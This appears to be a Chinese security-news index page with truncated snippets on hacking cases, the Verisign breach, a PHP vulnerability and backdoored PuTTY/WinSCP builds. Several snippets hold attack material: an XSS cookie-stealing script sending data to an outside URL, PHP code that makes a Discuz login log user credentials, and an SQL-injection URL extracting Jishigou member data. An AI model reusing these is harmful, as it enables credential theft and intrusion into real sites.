公司老总雇黑客报复对方网站被诉
公司网站频频受到黑客攻击,婚恋公司法人代表乐某怀疑是竞争对手所为,于是便雇佣黑客攻击对方网站。近日,朝阳区人民检察院对恶意网络攻击竞争对手的乐某等4人以破坏计算机信息系统罪提起公诉。 乐某是北京某婚恋公司法定代表人,由于公司网站屡遭黑客攻击,乐某就怀疑是竞争对手——本案的被害公司所为,2010年底,乐某找到公司网络总监赵某想让其攻击竞争对手的网站。 赵某通过一搜索引擎提示的相关信息找到黑客李某和霍...
根服务器管理公司承认在2010年被黑客入侵过
管理两台DNS域名根服务器和发行SSL证书的Verisign公司承认它在2010年曾被黑客入侵,但不知道有什么数据被盗取,称它不认为根服务器受到影响,但也不能排除它没受影响。 Verisign还承认,该公司的安全团队没有立即将入侵事件通知管理层,前CTO Ken Silva说他直到现在才听说有黑客入侵。在2010年收购Verisign证书发行业务的赛门铁克表示,没有证据表明系统受到影响。
PHP 5.3.9 重大漏洞 多语言拒绝服务漏洞事件预警
安全部门监测到目前PHP 5.3.9被黑客发现存在严重的安全漏洞,远程攻击者可以直接利用此漏洞执行任意PHP代码,安全风险非常高。经过跟进,该漏洞(CVE-2012-0830)是由于PHP官方为解决多语言hash漏洞引入了新的机制产生的新的安全漏洞。 【漏洞影响版本】 PHP5.3.9 注:在修复PHP多语言hash漏洞时若采用直接打补丁的方式(补丁地址:点击查看)不受此漏洞影响。 【修复方案】 ...
简单的HTML代码弄死Windows 7
这个很小的 iframe 标签(当然了,实际上它运行起来并不小)是一个强大到足以让一个64位的Win7系统崩溃的标签,它将导致 Win7 发生著名的蓝屏错误 Blue Screen Of Death (BSoD). 该漏洞是由 w3bd3vil报告的。该漏洞在64位的Win7下的Safari 浏览器测试中招,我很讨厌蓝屏,因此没有测试其他浏览器。微软正在进一步验证该漏洞,下面是关于该漏洞的一些技术...
跨站提取cookie的原理
个人理解为跨站就意味着可以执行javascript代码,javascript利用Document文档对象的cookie属性就获取到了cookie,然后就可能利用cookie欺骗登陆。 跨站提取cookie的原理 等价于 如何从在浏览器中获取cookie + 发送cookie到指定url 比如: <script>document.write('<img src="http://ww...
Discuz 密码记录
//打开source/function/function_member.php //找到function userlogin //在return $return;前面加上 $a=file_get_contents(dirname(__FILE__).’/1.txt’); file_put_contents(dirname(__FILE__).’/1.txt’),$a.”Id:”.$username...
putty和WinSCP后门检查及清理方式
检查及清理方式 检查/var/log 是否被删除# /usr/bin/stat /var/log 如果被删除了,说明中招了 查看/var/log 文件夹内容# ls -al /var/log 如果文件很少,说明中招了 监控名称为fsyslog,osysllog 的进程# /usr/bin/watch -n 1 /bin/ps -AFZ f \| /bin/grep syslog...
创宇安全研究团队:中文版putty后门事件分析
近几日,中文版putty等SSH远程管理工具被曝出存在后门,该后门会自动 窃取管理员所输入的SSH用户名与口令,并将其发送至指定服务器上。知道创宇安全研究小组在第一时间获取该消息后,对此次事件进行了跟踪和分析。根据分 析,此次事件涉及到来自putty.org.cn、putty.ws、winscp.cc和sshsecure.com站点的中文版putty、 WinSCP、SSHSecure和psftp...
部分中文版PuTTY和WinSCP软件内置后门
多个安全达人在微博发布消息,称在汉化版putty、WinSCP、SSH Secure等工具中发现后门。经金山毒霸安全中心验证,这些汉化版管理工具的确存在后门程序,可窃取管理员帐号,从而完全控制linux服务器。建议linux系统管理员应立刻卸载这些汉化版软件,并尽快修改管理员密码。 近期已经有多名Linux服务器管理员爆出服务器被恶意攻击,导致系统root密码泄漏以及资料泄漏,经查可能是由于内置后...
记事狗微博3.0 漏洞
不解释,你懂得! https://www.webshell.cc/wap/index.php?mod=pm&pm_new=and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x27,0x7e,jishigou_members.username,0x27,0x7e...